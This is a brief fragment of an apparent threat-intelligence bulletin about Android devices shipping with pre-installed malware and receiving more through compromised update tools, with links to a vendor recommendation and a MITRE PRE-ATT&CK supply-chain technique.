A device could come pre-installed with malware, and then could download additional malware via compromised third-party update tools.<br/> <a href="https://forum.anomali.com/t/google-warns-of-growing-android-attack-vector-backdoored-sdks-and-pre-installed-apps/3721">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/1259967">[MITRE PRE-ATT&amp;CK] Hardware or software supply chain implant (PRE-T1142)</a></p></div></div>
